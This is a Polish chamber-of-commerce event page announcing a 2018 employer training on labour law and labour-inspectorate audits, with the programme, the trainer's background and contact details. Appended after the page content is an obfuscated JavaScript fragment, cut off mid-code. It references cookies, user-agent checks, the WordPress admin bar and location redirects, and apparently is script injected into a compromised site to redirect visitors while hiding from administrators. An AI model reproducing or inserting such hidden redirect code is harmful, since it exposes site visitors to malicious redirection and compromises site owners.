Szkolenie z zakresu prawa pracy oraz kontroli PIP | Północna Izba Gospodarcza w Koszalinie

Polnocna-Izba-szkolenie-prawo-pracy

Zapraszamy wszystkich przedsiębiorców  na szkolenie z zakresu prawa pracy oraz kontroli PIP w tym zakresie. Szkolenie skierowane jest do pracodawców, a także przedsiębiorców powierzających wykonywanie pracy na innej podstawie niż umowa o pracę oraz służb kadrowych zakładów pracy. Szkolenie poprowadzi wyjątkowy ekspert – Pani Małgorzata Klowan, były pracownik Państwowej Inspekcji Pracy.

Termin warsztatów: 12.04.2018
Godziny: 10:00 – 13:00
Miejsce: Restauracja Maredo, ul. Zwycięstwa 45, Koszalin.

Głównym założeniem szkolenia jest przybliżenie w przystępny sposób zagadnień prawa pracy oraz wskazanie możliwości sprawnego zastosowania zmieniających się przepisów w codziennym funkcjonowaniu zakładu pracy. Szkolenie ma na celu wyjaśnienie ostatnich zmian przepisów nie tylko od strony teoretycznej, poprzez przytoczenie ich brzmienia, ale przede wszystkich ma wskazać drogę praktyczną w prawidłowym ich stosowaniu. Ponadto, z racji doświadczenia zawodowego, prowadzący przybliży zagadnienia związane z kontrolą przestrzegania prawa pracy prowadzoną przez Państwową Inspekcję Pracy oraz wskaże drogi zgodnego z prawem przejścia przez procedury kontrolne.

PROGRAM SZKOLENIA:
„Kontrola PIP w przedsiębiorstwie z uwzględnieniem najnowszych zmian w prawie pracy”
1. Co to jest PIP i na jakiej podstawie działa.
2. Zadania Państwowej Inspekcji Pracy.
3. Nadzór i kontrola przestrzegania prawa pracy, w tym przepisów i zasad bezpieczeństwa i higieny pracy.
4. Przebieg postępowania kontrolnego.
5. Uprawnienia podmiotu kontrolowanego.
6. Protokół kontroli i środki prawne wydawane przez PIP.
7. Postępowanie w sprawach o wykroczenia przeciwko prawom pracownika.
8. Uprawnienia organów PIP w zakresie kontroli związanych z nowymi uregulowaniami w zakresie minimalnego wynagrodzenia za pracę.
9. Omówienie najnowszych zmian w prawie pracy.
10. Dyskusja.

Polnocna-Iazba-szkolenie-prawo-pracy-malgorzata-klowan

Szkolenie poprowadzi Pani Małgorzata Klowan – prawnik-praktyk. W latach 2003-2017 była pracownikiem Państwowej Inspekcji Pracy – Okręgowy Inspektorat Pracy w Szczecinie, w latach 2004-2017 na stanowiskach inspektora pracy, starszego inspektora pracy i starszego inspektora pracy – specjalisty. W trakcie kilkunastoletniej pracy w charakterze inspektora pracy zajmowała się przede wszystkim:
• kontrolą i nadzorem nad warunkami pracy (kontrole zakładów pracy),
• przygotowywaniem analiz i opinii prawnych z zakresu prawa pracy, wydawaniem decyzji administracyjnych,
• współpracą z jednostkami administracji państwowej i partnerami społecznymi (związki zawodowe, społeczna inspekcja pracy),
• czynnie uczestniczyła w akcjach promocyjno-prewencyjnych organizowanych przez PIP, a adresowanych do różnych grup zawodowych oraz młodzieży szkolnej i studentów,
• przygotowywała szereg opracowań w dziedzinie prawa pracy dla celów szkoleniowych, ze szczególnym uwzględnieniem wprowadzanych zmian w prawie pracy,
• specjalista z zakresu prawa pracy w placówkach oświatowych oraz podmiotach leczniczych.
Od 2004 roku czynny wykładowca i trener szkoleń i kursów z zakresu prawa pracy w różnych formach edukacyjnych, adresowanych do różnych grup zawodowych, a także związków zawodowych, m.in. prowadzi kursy specjalistów personalnych i działów kadr i płac, dotyczące czasu pracy i wynagrodzeń, prawo pracy dla menadżerów, kadr zarządzających i pracodawców.

Potwierdzenia obecności prosimy wysyłać na adres koszalin@izba.info lub telefonicznie pod numer 537 184 630.

Jeżeli podane godziny szkoleń Państwu nie odpowiadają, bardzo prosimy o informację.

Więcej informacji: https://www.facebook.com/events/315585918966959/

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m